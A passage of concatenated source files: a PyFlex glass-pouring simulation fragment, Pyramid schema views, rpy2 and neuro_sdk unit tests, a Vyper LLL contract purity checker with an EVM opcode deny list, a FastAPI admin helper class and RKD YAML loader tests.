relative_coord = np.array([(dis_x+ border) / 2., (self.height) / 2., 0.])
states[2, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
# back wall
relative_coord = np.array([0, (self.height) / 2., -(dis_z+ border) / 2.])
states[3, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
# front wall
relative_coord = np.array([0, (self.height) / 2., (dis_z+ border) / 2.])
states[4, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
elif self.action_mode == 'rotation_top':
# floor
relative_coord = np.array([0, -self.height, 0.])
states[0, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
# left wall
relative_coord = np.array([-(dis_x+ border) / 2., -self.height / 2., 0.])
states[1, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
# right wall
relative_coord = np.array([(dis_x+ border) / 2., -self.height / 2., 0.])
states[2, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
# back wall
relative_coord = np.array([0, -self.height / 2., -(dis_z+ border) / 2.])
states[3, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
# front wall
relative_coord = np.array([0, -self.height / 2., (dis_z) / 2.])
states[4, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
states[:, 6:10] = quat_curr
return states
def init_glass_state(self, x, y, glass_dis_x, glass_dis_z, height, border):
'''
set the initial state of the glass.
'''
dis_x, dis_z = glass_dis_x, glass_dis_z
x_center, y_curr, y_last = x, y, 0.
quat = quatFromAxisAngle([0, 0, -1.], 0.)
# states of 5 walls
states = np.zeros((5, self.dim_shape_state))
# floor
states[0, :3] = np.array([x_center, y_curr, 0.])
states[0, 3:6] = np.array([x_center, y_last, 0.])
# left wall
states[1, :3] = np.array([x_center - (dis_x + border) / 2., (height ) / 2. + y_curr, 0.])
states[1, 3:6] = np.array([x_center - (dis_x + border) / 2., (height ) / 2. + y_last, 0.])
# right wall
states[2, :3] = np.array([x_center + (dis_x + border) / 2., (height ) / 2. + y_curr, 0.])
states[2, 3:6] = np.array([x_center + (dis_x + border) / 2., (height ) / 2. + y_last, 0.])
# back wall
states[3, :3] = np.array([x_center, (height ) / 2. + y_curr, -(dis_z + border) / 2.])
states[3, 3:6] = np.array([x_center, (height ) / 2. + y_last, -(dis_z + border) / 2.])
# front wall
states[4, :3] = np.array([x_center, (height ) / 2. + y_curr, (dis_z + border) / 2.])
states[4, 3:6] = np.array([x_center, (height ) / 2. + y_last, (dis_z + border) / 2.])
states[:, 6:10] = quat
states[:, 10:] = quat
return states
def set_shape_states(self, glass_states, poured_glass_states):
'''
set the the shape states of both glasses.
'''
all_states = np.concatenate((glass_states, poured_glass_states), axis=0)
pyflex.set_shape_states(all_states)
def in_glass(self, water, glass_states, border, height):
'''
judge whether a water particle is in the poured glass
water: [x, y, z, 1/m] water particle state.
'''
# floor, left, right, back, front
# state:
# 0-3: current (x, y, z) coordinate of the center point
# 3-6: previous (x, y, z) coordinate of the center point
# 6-10: current quat
# 10-14: previous quat
x_lower = glass_states[1][0] - border / 2.
x_upper = glass_states[2][0] + border / 2.
z_lower = glass_states[3][2] - border / 2.
z_upper = glass_states[4][2] + border / 2
y_lower = glass_states[0][1] - border / 2.
y_upper = glass_states[0][1] + height + border / 2.
x, y, z = water[:, 0], water[:, 1], water[:, 2]
res = (x >= x_lower) * (x <= x_upper) * (y >= y_lower) * (y <= y_upper) * (z >= z_lower) * (z <= z_upper)
return res
def judge_glass_collide(self, new_states, rotation):
'''
judge if the front wall of the pouring glass would collide with the front wall of the poured glass.
'''
pouring_right_wall_center = new_states[2][:3]
pouring_left_wall_center = new_states[1][:3]
# build the corner of the front wall of the control glass
r_corner1_relative_cord = np.array([self.border / 2., self.height / 2., self.glass_dis_z / 2 + self.border])
r_corner1_real = rotate_rigid_object(center=pouring_right_wall_center, axis=np.array([0, 0, -1]), angle=rotation,
relative=r_corner1_relative_cord)
r_corner3_relative_cord = np.array([self.border / 2., -self.height / 2., self.glass_dis_z / 2 - self.border])
r_corner3_real = rotate_rigid_object(center=pouring_right_wall_center, axis=np.array([0, 0, -1]), angle=rotation,
relative=r_corner3_relative_cord)
r_corner5_relative_cord = np.array([-self.border / 2., -self.height / 2., self.glass_dis_z / 2 + self.border])
r_corner5_real = rotate_rigid_object(center=pouring_left_wall_center, axis=np.array([0, 0, -1]), angle=rotation,
relative=r_corner5_relative_cord)
r_corner8_relative_cord = np.array([-self.border / 2., self.height / 2., self.glass_dis_z / 2 + self.border])
r_corner8_real = rotate_rigid_object(center=pouring_left_wall_center, axis=np.array([0, 0, -1]), angle=rotation,
relative=r_corner8_relative_cord)
control_polygon = Polygon([r_corner1_real[:2], r_corner3_real[:2], r_corner5_real[:2], r_corner8_real[:2]])
left_wall_center = self.poured_glass_states[1][:3]
leftx, lefty = left_wall_center[0], left_wall_center[1]
right_wall_center = self.poured_glass_states[2][:3]
rightx, righty = right_wall_center[0], right_wall_center[1]
border = self.poured_border
target_front_corner1 = np.array([leftx - border / 2, lefty + self.poured_height / 2])
traget_front_corner2 = np.array([leftx - border / 2, lefty - self.poured_height / 2])
traget_front_corner3 = np.array([rightx + border / 2, righty - self.poured_height / 2])
target_front_corner4 = np.array([rightx + border / 2, righty + self.poured_height / 2])
target_polygon = Polygon([target_front_corner1, traget_front_corner2, traget_front_corner3, target_front_corner4])
res = control_polygon.intersects(target_polygon)
return res
def above_floor(self, states, rotation):
'''
judge all the floors are above the ground.
'''
floor_center = states[0][:3]
corner_relative = [
np.array([self.glass_dis_x / 2., -self.border / 2., self.glass_dis_z / 2.]),
np.array([self.glass_dis_x / 2., -self.border / 2., -self.glass_dis_z / 2.]),
np.array([-self.glass_dis_x / 2., -self.border / 2., self.glass_dis_z / 2.]),
np.array([-self.glass_dis_x / 2., -self.border / 2., -self.glass_dis_z / 2.]),
np.array([self.glass_dis_x / 2., self.border / 2. + self.height, self.glass_dis_z / 2.]),
np.array([self.glass_dis_x / 2., self.border / 2. + self.height, -self.glass_dis_z / 2.]),
np.array([-self.glass_dis_x / 2., self.border / 2. + self.height, self.glass_dis_z / 2.]),
np.array([-self.glass_dis_x / 2., self.border / 2. + self.height, -self.glass_dis_z / 2.]),
]
for corner_rel in corner_relative:
corner_real = rotate_rigid_object(center=floor_center, axis=np.array([0, 0, -1]), angle=rotation,
relative=corner_rel)
if corner_real[1] < - self.border / 2:
return False
return True |
the-stack_0_19855 | from pyramid.httpexceptions import HTTPNotFound
from pyramid.view import view_config
from .etag import etag_app_version_effective_principals
from .interfaces import (
COLLECTIONS,
TYPES,
)
from .util import mutated_schema
def includeme(config):
config.add_route('schemas', '/profiles{slash:/?}')
config.add_route('schema', '/profiles/{type_name}.json')
config.add_route('schemap', '/profiles/{type_name}{slash:/?}')
config.add_route('schemas_map', '/profiles-map/')
config.add_route('schemas_titles', '/profiles-titles/')
config.scan(__name__)
def _apply_permission(collection, request):
def mutator(schema):
if 'permission' in schema:
if not request.has_permission(schema['permission'], collection):
schema = schema.copy()
schema['readonly'] = True
return schema
return mutator
def _annotated_schema(type_info, request):
schema = type_info.schema.copy()
schema['@type'] = ['JSONSchema']
if type_info.factory is None:
return schema
collection = request.registry[COLLECTIONS][type_info.name]
return mutated_schema(
schema,
_apply_permission(collection, request),
)
@view_config(route_name='schema', request_method='GET',
decorator=etag_app_version_effective_principals)
@view_config(route_name='schemap', request_method='GET',
decorator=etag_app_version_effective_principals)
def schema(context, request):
type_name = request.matchdict['type_name']
types = request.registry[TYPES]
try:
type_info = types[type_name]
except KeyError:
raise HTTPNotFound(type_name)
return _annotated_schema(type_info, request)
@view_config(route_name='schemas', request_method='GET',
decorator=etag_app_version_effective_principals)
def schemas(context, request):
types = request.registry[TYPES]
schemas = {}
for type_info in types.by_item_type.values():
name = type_info.name
schemas[name] = _annotated_schema(type_info, request)
schemas['_subtypes'] = subtypes = {}
schemas['@type'] = ['JSONSchemas']
for name, type_info in types.abstract.items():
subtypes[name] = type_info.subtypes
return schemas
@view_config(route_name='schemas_map', request_method='GET',
decorator=etag_app_version_effective_principals)
def schemas_map(context, request):
types = request.registry[TYPES]
profiles_map = {}
for type_info in types.by_item_type.values():
if 'id' in type_info.schema:
profiles_map[type_info.name] = type_info.schema['id']
profiles_map['@type'] = ['JSONSchemas']
return profiles_map
@view_config(route_name='schemas_titles', request_method='GET',
decorator=etag_app_version_effective_principals)
def schemas_titles(context, request): # pylint: disable=unused-argument
'''Return mapping of all schema @types and their corresponding titles'''
types = request.registry[TYPES]
profiles_titles = {
type_info.name: type_info.schema['title']
for type_info in types.by_item_type.values()
if 'title' in type_info.schema
}
profiles_titles['@type'] = ['JSONSchemas']
return profiles_titles
|
the-stack_0_19857 | import unittest
import rpy2.robjects as robjects
rinterface = robjects.rinterface
class FormulaTestCase(unittest.TestCase):
def testNew(self):
fml = robjects.Formula("y ~ x")
self.assertEqual("formula", fml.rclass[0])
def testGetenvironment(self):
fml = robjects.Formula("y ~ x")
env = fml.getenvironment()
self.assertEqual("environment", env.rclass[0])
def testSetenvironment(self):
fml = robjects.Formula("y ~ x")
newenv = robjects.baseenv['new.env']()
env = fml.getenvironment()
self.assertFalse(newenv.rsame(env))
fml.setenvironment(newenv)
env = fml.getenvironment()
self.assertTrue(newenv.rsame(env))
def suite():
suite = unittest.TestLoader().loadTestsFromTestCase(FormulaTestCase)
return suite
if __name__ == '__main__':
unittest.main()
|
the-stack_0_19859 | from typing import Any, Awaitable, Callable, List, Tuple
import pytest
from dateutil.parser import isoparse
from neuro_sdk import Bucket, BucketCredentials, PersistentBucketCredentials
from neuro_cli.formatters.bucket_credentials import (
BucketCredentialFormatter,
BucketCredentialsFormatter,
SimpleBucketCredentialsFormatter,
)
async def test_bucket_credentials_formatter(rich_cmp: Any) -> None:
bucket = Bucket(
id="bucket",
name="test-bucket",
owner="user",
cluster_name="cluster",
provider=Bucket.Provider.AWS,
created_at=isoparse("2017-03-04T12:28:59.759433+00:00"),
imported=False,
)
credentials = PersistentBucketCredentials(
id="bucket-credentials",
name="test-credentials",
owner="user",
cluster_name="cluster",
read_only=False,
credentials=[
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id=bucket.id,
credentials={
"key1": "value1",
"key2": "value2",
},
)
],
)
async def _get_bucket(bucket_id: str) -> Bucket:
assert bucket_id == bucket.id
return bucket
fmtr = BucketCredentialFormatter(get_bucket=_get_bucket)
rich_cmp(await fmtr(credentials))
CredListFixture = Tuple[
List[PersistentBucketCredentials], Callable[[str], Awaitable[Bucket]]
]
@pytest.fixture
def credentials_list_fixture() -> CredListFixture:
buckets = [
Bucket(
id="bucket-1",
name="test-bucket",
owner="user",
cluster_name="cluster",
created_at=isoparse("2017-03-04T12:28:59.759433+00:00"),
provider=Bucket.Provider.AWS,
imported=False,
),
Bucket(
id="bucket-2",
name="test-bucket-2",
owner="user",
cluster_name="cluster",
created_at=isoparse("2016-03-04T12:28:59.759433+00:00"),
provider=Bucket.Provider.AWS,
imported=False,
),
Bucket(
id="bucket-3",
name=None,
owner="user-2",
cluster_name="cluster",
created_at=isoparse("2018-03-04T12:28:59.759433+00:00"),
provider=Bucket.Provider.AWS,
imported=False,
),
Bucket(
id="bucket-4",
name=None,
owner="user",
cluster_name="cluster",
created_at=isoparse("2019-03-04T12:28:59.759433+00:00"),
provider=Bucket.Provider.AWS,
imported=False,
),
]
async def _get_bucket(bucket_id: str) -> Bucket:
return next(bucket for bucket in buckets if bucket.id == bucket_id)
credentials = [
PersistentBucketCredentials(
id="bucket-credentials-1",
name="test-credentials-1",
owner="user",
cluster_name="cluster",
read_only=False,
credentials=[
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id="bucket-1",
credentials={
"key1": "value1",
"key2": "value2",
},
),
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id="bucket-2",
credentials={
"key1": "value1",
"key2": "value2",
},
),
],
),
PersistentBucketCredentials(
id="bucket-credentials-2",
name="test-credentials-3",
owner="user",
cluster_name="cluster",
read_only=True,
credentials=[
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id="bucket-3",
credentials={
"key1": "value1",
"key2": "value2",
},
),
],
),
PersistentBucketCredentials(
id="bucket-credentials-3",
name="test-credentials-3",
owner="user",
cluster_name="cluster",
read_only=False,
credentials=[
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id="bucket-3",
credentials={
"key1": "value1",
"key2": "value2",
},
),
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id="bucket-4",
credentials={
"key1": "value1",
"key2": "value2",
},
),
],
),
]
return credentials, _get_bucket
async def test_buckets_credentials_formatter_simple(
credentials_list_fixture: CredListFixture, rich_cmp: Any
) -> None:
fmtr = SimpleBucketCredentialsFormatter()
rich_cmp(await fmtr(credentials_list_fixture[0]))
async def test_buckets_credentials_formatter(
credentials_list_fixture: CredListFixture, rich_cmp: Any
) -> None:
fmtr = BucketCredentialsFormatter(credentials_list_fixture[1])
rich_cmp(await fmtr(credentials_list_fixture[0]))
|
the-stack_0_19861 | ## This Python source code hosts the Vyper LLL used for the purity checker.
## The purity checker scans a contract's bytecode to see if it uses any operations that rely on (external) mutable state.
## This code was ported from an original written in the deprecated Serpent: https://github.com/ethereum/research/blob/master/impurity/check_for_impurity.se
## The following are memory maps for each function:
# MEMORY MAP for `submit` method
# [320, 351]: addr, the input address, 32 bytes
# [352, 352+_EXTCODESIZE-1]: bytecode at addr, _EXTCODESIZE bytes
# [352+_EXTCODESIZE, 352+33*_EXTCODESIZE-32]: ops, array to hold processed opcodes, 32*_EXTCODESIZE bytes
# [352+33*_EXTCODESIZE, 352+65*_EXTCODESIZE-32]: pushargs, array to hold processed push arguments, 32*_EXTCODESIZE bytes
# [352+65*_EXTCODESIZE, 383+65*_EXTCODESIZE]: i, loop counter, 32 bytes
# MEMORY MAP for `check` method
# [320, 351]: addr, the input address, 32 bytes
from vyper import compile_lll, optimizer
from vyper.parser.parser import LLLnode
from vyper.opcodes import opcodes
def find_opcode_hex(opcode):
if opcode in opcodes:
return opcodes[opcode][0]
return opcode
banned_opcodes = map(find_opcode_hex,[
'BALANCE',
'ORIGIN',
'CALLER',
'GASPRICE',
'EXTCODESIZE',
'EXTCODECOPY',
'BLOCKHASH',
'COINBASE',
'TIMESTAMP',
'NUMBER',
'DIFFICULTY',
'GASLIMIT',
0x46, # rest of the 0x40 opcode space
0x47,
0x48,
0x49,
0x4a,
0x4b,
0x4c,
0x4d,
0x4e,
0x4f,
'SLOAD',
'SSTORE',
'GAS',
'CREATE',
'SELFDESTRUCT'
])
banned_opcodes_bitmask = sum([2**x for x in banned_opcodes])
invalid_if_banned = ["if",
["and", banned_opcodes_bitmask, ["exp", 2, "_c"]],
"invalid"]
is_push = ["and", ["le", 0x60, "_c"], ["le", "_c", 0x7f]]
def index_pushargs(index):
return ["add", ["add", 352, ["mul", 33, "_EXTCODESIZE"]], ["mul", 32, index]]
handle_push = ["seq",
["mstore", index_pushargs("_op"), ["div", ["mload", ["add", ["add", 352, ["mload", "_i"]], 1]], ["exp", 256, ["sub", 0x7f, "_c"]]]],
["mstore", "_i", ["add", ["sub", "_c", 0x5f], ["mload", "_i"]]]] # there is an extra -1 in here to account for the increment of the repeat loop; -0x5e ~> -0x5f from the serpent code
is_some_call = ["or", ["eq", "_c", 0xf1],
["or", ["eq", "_c", 0xf2], ["eq", "_c", 0xf4]]]
def index_ops(index):
return ["add", ["add", 352, "_EXTCODESIZE"], ["mul", 32, index]]
find_address = ["if", ["and", ["ge", "_op", 2],
["and", ["ge", ["mload", index_ops(["sub", "_op", 1])], 0x60],
["le", ["mload", index_ops(["sub", "_op", 1])], 0x7f]]],
["set", "_address_entry", ["sub", "_op", 2]],
["if",
["and", ["ge", "_op", 4],
["and", ["eq", ["mload", index_ops(["sub", "_op", 1])], 0x03],
["and", ["eq",
["mload", index_ops(["sub", "_op", 2])], 0x5a],
["and", ["ge",
["mload", index_ops(["sub", "_op", 3])], 0x60],
["le",
["mload", index_ops(["sub", "_op", 3])], 0x7f]]]]],
["set", "_address_entry", ["sub", "_op", 4]],
["if", ["and", ["ge", "_op", 2],
["eq",
["mload", index_ops(["sub", "_op", 1])], 0x5a]],
["set", "_address_entry", ["sub", "_op", 2]],
["if", ["and", ["ge", "_op", 2],
["eq",
["mload", index_ops(["sub", "_op", 1])], 0x90]],
["set", "_address_entry", ["sub", "_op", 2]],
["if", ["and", ["ge", "_op", 2],
["and", ["ge",
["mload", index_ops(["sub", "_op", 1])], 0x80],
["lt",
["mload", index_ops(["sub", "_op", 1])], 0x90]]],
["set", "_address_entry", ["sub", "_op", 2]],
"invalid"]]]]]
filter_address_usage = ["if", ["sload", ["add", ["sha3_32", 0], # self.approved_addrs
["mload", index_pushargs("_address_entry")]]],
["seq"],
["if", ["eq",
["mload", index_ops("_address_entry")], 0x30],
["seq"],
["if", ["eq",
["mload", index_ops("_address_entry")], 0x60],
["seq"],
"invalid"]]]
handle_some_call = ["with", "_address_entry", 0,
["seq",
find_address,
filter_address_usage]]
dispatch_compound_sequences = ["if", is_push,
handle_push,
["if", is_some_call,
handle_some_call]]
process_byte = ["seq",
invalid_if_banned,
dispatch_compound_sequences,
["mstore", ["add", ["add", 352, "_EXTCODESIZE"], ["mul", 32, "_op"]], "_c"],
["set", "_op", ["add", "_op", 1]]]
loop_body = ["if",
["ge", ["mload", "_i"], "_EXTCODESIZE"],
"break",
["with", "_c", ["mod", ["mload", ["add", 352, ["sub", ["mload", "_i"], 31]]], 256],
process_byte]]
purity_checker_lll = LLLnode.from_list(
["seq",
["return",
0,
["lll",
["seq",
["mstore", 28, ["calldataload", 0]],
["mstore", 32, 1461501637330902918203684832716283019655932542976],
["mstore", 64, 170141183460469231731687303715884105727],
["mstore", 96, -170141183460469231731687303715884105728],
["mstore", 128, 1701411834604692317316873037158841057270000000000],
["mstore", 160, -1701411834604692317316873037158841057280000000000],
["if",
["eq", ["mload", 0], 2710585003], # submit
["seq",
["calldatacopy", 320, 4, 32],
["assert", ["iszero", "callvalue"]],
["uclamplt", ["calldataload", 4], ["mload", 32]], # checking address input
# scan bytecode at address input
["with", "_EXTCODESIZE", ["extcodesize", ["mload", 320]], # addr
["if", ["eq", "_EXTCODESIZE", 0],
"invalid", # ban accounts with no code
["seq",
["extcodecopy", ["mload", 320], 352, 0, "_EXTCODESIZE"],
["with", "_i", ["add", 352, ["mul", 65, "_EXTCODESIZE"]],
["with", "_op", 0,
["repeat", "_i", 0,
115792089237316195423570985008687907853269984665640564039457584007913129639935,
loop_body]]]]]],
# approve the address `addr`
["sstore", ["add", ["sha3_32", 0], ["mload", 320]], 1],
["mstore", 0, 1],
["return", 0, 32],
"stop"]],
["if",
["eq", ["mload", 0], 3258357672], # check
["seq",
["calldatacopy", 320, 4, 32],
["assert", ["iszero", "callvalue"]],
["uclamplt", ["calldataload", 4], ["mload", 32]], # checking address input
["mstore", 0, ["sload", ["add", ["sha3_32", 0], ["mload", 320]]]],
["return", 0, 32],
"stop"]]],
0]]])
def lll_to_evm(lll):
return compile_lll.assembly_to_evm(compile_lll.compile_to_assembly(optimizer.optimize(lll)))
def purity_checker_data():
return lll_to_evm(purity_checker_lll)
def purity_checker_data_hex():
return '0x' + purity_checker_data().hex()
|
the-stack_0_19863 | # -*- encoding: utf-8 -*-
"""
@File : __init__.py.py
@Time : 2020/4/2 21:04
@Author : chise
@Email : [email protected]
@Software: PyCharm
@info :
"""
from .databaseManage import AdminDatabase
from fastapi_admin.schema_tool import create_schema as create_schema_v2
from fastapi import APIRouter
from typing import Union, List, Any, Set
from .auth.views import login, create_create, create_superuser
from .publicDepends.paging_query import get_res_schema, page_query
from .schema_tool import create_page_schema
from .views import create_View, method_get_func
from typing import Optional
from .auth.models import User, Group, Permission, UserLog
from .auth.schemas import Token
from .schema_tools import create_schema
from .config.schemas import BaseConfig
from .config.models import Config
from .views.methods_get import model_get_func_fetch_one
from .auth.views import router as auth_router
class FastAPIAdmin:
"""
该类为核心类,主要功能是注册Model或者Table,生成对应的schema和路由
组装View,Model和schema
"""
_instance = None
# 单例模式的路由,所有的方法都会在这个路由注册,这个路由在初始化的时候注册到app
__router = None
# 存储已经注册了的Table
table = []
# 注册的所有schema,保证不要重复注册
schema = []
# 暂时这么命名,存储生成的类视图,
api_class = []
def __new__(cls, *args, **kwargs):
"""要求这个类是单例模式,保证只注册一次"""
if not cls._instance:
cls._instance = super().__new__(cls)
return cls._instance
def create_database(self):
"""创建数据库"""
self.admin_database.create_all()
def __init__(self, router: APIRouter, database_url: str):
"""
创建的时候,注册__router,
传递数据的链接方式,独立连接,使用异步方式。
database_connectinfo数据库连接方式
"""
# 注册
# router.include_router(self.__router,prefix='/admin',tags=['admin'])
self.__router = router
self.admin_database = AdminDatabase(database_url=database_url)
#注册路由
self.__router.include_router(auth_router, prefix='/auth', tags=['auth'])
# 需要创建数据库的时候
# self.admin_database.create_all()
self.database = self.admin_database.database
router.on_event('startup')(self.admin_database.startup)
router.on_event('shutdown')(self.admin_database.shutdown)
# 注册login
self.default_registe()
def register_Model(self, model: Any, view=None,
methods: Union[List[str], Set[str]] = ('GET', 'Retrieve', 'POST', 'PUT', 'DELETE'),
schema=None,
schema_noid=None,
fields: Union[str, List[str]] = "__all__",
list_display: Union[str, List[str]] = "__all__", put_fields: Optional[List[str]] = None,
need_user=False, get_need_user=False, depends=None) -> bool:
"""
注册model到路由,
:param model: sqlalchemy的model
:param view: 自定义View类
:param methods: 允许访问的方法
:param fields: post的字段,默认为所有字段,如果需要
:param list_display: 显示在列表的字段
:param put_fields: put允许的字段,默认为fields相同
:return:是否注册成功
"""
__schema, __schema_noid = create_schema(model)
if not schema:
schema = __schema
if not schema_noid:
schema_noid = __schema_noid
if not view:
view = create_View(model=model, database=self.database, schema=schema, schema_noid=schema_noid,
need_user=need_user, get_need_user=get_need_user)
else:
view.database = self.database
# 注册一个专门的蓝图
self.register_view(view, "/" + model.__name__, methods=methods, depends=depends)
return True
def register_view(self, view, prefix=None,
methods: Union[List[str], Set[str]] = ('GET', 'Retrieve', 'POST', 'PUT', 'DELETE'), tags=None,
depends=None):
"""
如果不使用自定义的,则需要methods为None
:param view:
:param prefix:
:param methods:
:param tags:
:return:
"""
router = APIRouter()
if not prefix:
prefix = "/" + view.__class__.__name__
if not tags:
tags = [prefix[1:]]
if not methods:
methods = view.methods
if methods.count('GET'):
# print("注意,可能需要设置返回model")
# get_res_model = get_res_schema(view.schema)
router.get(prefix, tags=tags, )(view.list)
if methods.count('Retrieve'):
router.get(prefix + "/{id}", tags=tags, )(view.retrieve)
if methods.count('POST'):
router.post(prefix, tags=tags, )(view.create)
if methods.count('PUT'):
router.put(prefix, tags=tags, )(view.update)
if methods.count('DELETE'):
router.delete(prefix + "/{id}", tags=tags)(view.delete)
self.__router.include_router(router, prefix='/admin')
def register_router(self, func, method, prefix, res_model=None, tags=None, ):
"""
注册路由
:param func:函数
:param method: method方法
:param prefix: 路由
:param res_model: 模型
:param tags: 标签
:return:
"""
if method == 'GET':
if res_model:
self.__router.get(prefix, response_model=res_model)(func)
else:
self.__router.get(prefix, )(func)
else:
if res_model:
self.__router.post(prefix, response_model=res_model)(func)
else:
self.__router.post(prefix, )(func)
def default_registe(self):
"""
默认需要注释的
:return:
"""
# 注册login
self.__router.post('/user/login', response_model=Token)(login)
schema, schema_noid = create_schema(User)
view = create_View(model=User, database=self.database, schema=schema, schema_noid=schema_noid, need_user=True,
get_need_user=True)
view.create = create_create(User, self.database)
# user_list,user_list model_get_func_fetch_one
# view.delete=
# self.register_view(view, prefix="/user", methods=['GET', "Retrieve", "PUT", "POST",'DELETE'])
self.register_Model(Group, need_user=True, get_need_user=True)
self.register_Model(Permission, need_user=True, get_need_user=True)
self.register_Model(UserLog, methods=['GET'], need_user=True, get_need_user=True)
from .config.views import config_update, BaseConfig, email_config_update, EmailConfig
# self.register_router(create_create,method="POST",prefix="/user/createUser",)
self.register_router(config_update, method="PUT", prefix="/config/baseconfig", )
self.register_router(email_config_update, method="PUT", prefix="/config/emailconfig", )
baseconfig_func, baseconfig_schema = model_get_func_fetch_one(Config, "BaseConfig", need_user=False)
emailconfig_func, email_config_schema = model_get_func_fetch_one(Config, "EmailConfig",
fields=["smtp_host", "smtp_port", "smtp_email",
"smtp_email_password"], need_user=True)
self.register_router(baseconfig_func, method="GET", prefix="/config/baseconfig", res_model=BaseConfig, )
self.register_router(emailconfig_func, method="GET", prefix="/config/emailconfig", res_model=EmailConfig)
def register_Model_v2(self, model, params_dict: dict):
"""升级版获取view"""
# 注意:如果model是一个列表,那么根据model列表生成一个总的字段。
# 如果model为一个list,则field一定要自定义,防止出现重复字段,
# 如果两个model有重复字段,那么使用model名字+_字段名字的格式进行field控制和exclude和field_param控制
# 由于暂时没有需求,大家自行解决重复字段的显示问题,对于id这个参数,默认会是最后一个model的字段,当然这并不影响(因为绝大多数的model_id都是同样的规则)
for method, param in params_dict.items():
if method == 'GET':
# schema_name = param.get('schema_name') or param.get("name") or str(model.__name__) + "_" + str(
# ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', 5)))
# if str(param.get('use_page', None)) == 'None' or param.get('use_page', None):
# schema = create_page_schema(model, schema_name=schema_name, need_fields=param.get('need_fields'),
# fields_params=param.get('fields'), exclude=param.get("exclude"))
#
#
# else:
# schema = create_schema_v2(model, schema_name=schema_name, need_fields=param.get('need_fields'),
# fields_params=param.get('fields'), exclude=param.get("exclude"))
if isinstance(model, list):
func = page_query(model, param.get("sql"))
else:
func = page_query(model)
prefix = param.get("prefix") or "/v2/admin/" + str(model.__name__)
self.__router.get(prefix, description=param.get('description'), name=param.get("name"), )(func)
|
the-stack_0_19866 | #!/usr/bin/env python3
import os
import tempfile
from rkd.api.testing import BasicTestingCase
from rkd.yaml_parser import YamlFileLoader
from rkd.exception import YAMLFileValidationError
SCRIPT_DIR_PATH = os.path.dirname(os.path.realpath(__file__))
def last_occurrence_replace(s, old, new):
return (s[::-1].replace(old[::-1], new[::-1], 1))[::-1]
class TestLoader(BasicTestingCase):
def test_validates_successfully(self):
yaml_loader = YamlFileLoader([])
parsed = yaml_loader.load('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks: {}
''', schema_name='org.riotkit.rkd/yaml/v1')
self.assertIn('version', parsed)
def test_raises_error_when_type_does_not_match(self):
"""Expect OBJECT at .tasks path, but get ARRAY instead"""
yaml_loader = YamlFileLoader([])
self.assertRaises(
YAMLFileValidationError,
lambda: yaml_loader.load('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks: []
''', schema_name='org.riotkit.rkd/yaml/v1')
)
def test_expect_path_will_be_shown_in_exception_message(self):
"""Simply check if path to the attribute will be printed within the exception"""
yaml_loader = YamlFileLoader([])
try:
yaml_loader.load('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks:
:join:iwa-ait: []
''', schema_name='org.riotkit.rkd/yaml/v1')
except YAMLFileValidationError as e:
self.assertIn(
"YAML schema validation failed at path \"tasks.:join:iwa-ait\" with error: [] is not of type 'object'",
str(e)
)
return
self.fail('Expected an exception to be raised')
def test_expect_deeper_validation_will_be_performed(self):
"""Expects that argparse arguments will be validated"""
yaml_loader = YamlFileLoader([])
try:
yaml_loader.load('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks:
:join:iwa-ait:
description: Subscribe to any local section of IWA-AIT, workers have common interest
arguments:
- not a list
''', schema_name='org.riotkit.rkd/yaml/v1')
except YAMLFileValidationError as e:
self.assertIn("tasks.:join:iwa-ait.arguments", str(e))
self.assertIn("is not of type 'object'", str(e))
return
self.fail('Expected an exception to be raised')
def test_loads_from_file_is_searching_in_rkd_path(self):
"""Assert that makefile.yml will be searched in RKD_PATH"""
yaml_loader = YamlFileLoader([])
d = tempfile.TemporaryDirectory()
os.environ['RKD_PATH'] = d.name
with open(d.name + '/makefile.yml', 'w') as f:
f.write('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks:
:join:iwa-ait:
description: Subscribe to any local section of IWA-AIT, workers have common interest
arguments:
- not a list
''')
try:
self.assertRaises(YAMLFileValidationError,
lambda: yaml_loader.load_from_file('makefile.yml', 'org.riotkit.rkd/yaml/v1'))
finally:
d.cleanup()
os.environ['RKD_PATH'] = ''
def test_invalid_file_path_is_causing_exception(self):
"""Test that invalid path will be reported quickly"""
yaml_loader = YamlFileLoader([])
self.assertRaises(FileNotFoundError,
lambda: yaml_loader.load_from_file('non-existing-file.yml', 'org.riotkit.rkd/yaml/v1'))
def test_get_lookup_paths_includes_internal_path_as_well_as_rkd_path(self):
"""Verify that lookup paths includes RKD_PATH and internal RKD directories"""
yaml_loader = YamlFileLoader([])
os.environ['RKD_PATH'] = 'SOME-PATH-THERE'
try:
paths = yaml_loader.get_lookup_paths('harbor-internal/')
finally:
os.environ['RKD_PATH'] = ''
defined_by_rkd_path = paths.index('SOME-PATH-THERE/harbor-internal/')
internal_path = last_occurrence_replace(os.path.realpath(SCRIPT_DIR_PATH) + '/harbor-internal/', 'test/', '')
internal_path_index = paths.index(internal_path)
self.assertGreater(defined_by_rkd_path, internal_path_index, msg='defined_by_rkd_path should be favored')
def test_find_path_by_name_founds_path(self):
"""Assert that makefile.yml will be searched in RKD_PATH"""
yaml_loader = YamlFileLoader([])
d = tempfile.TemporaryDirectory()
os.environ['RKD_PATH'] = d.name
with open(d.name + '/makefile.yml', 'w') as f:
f.write('''
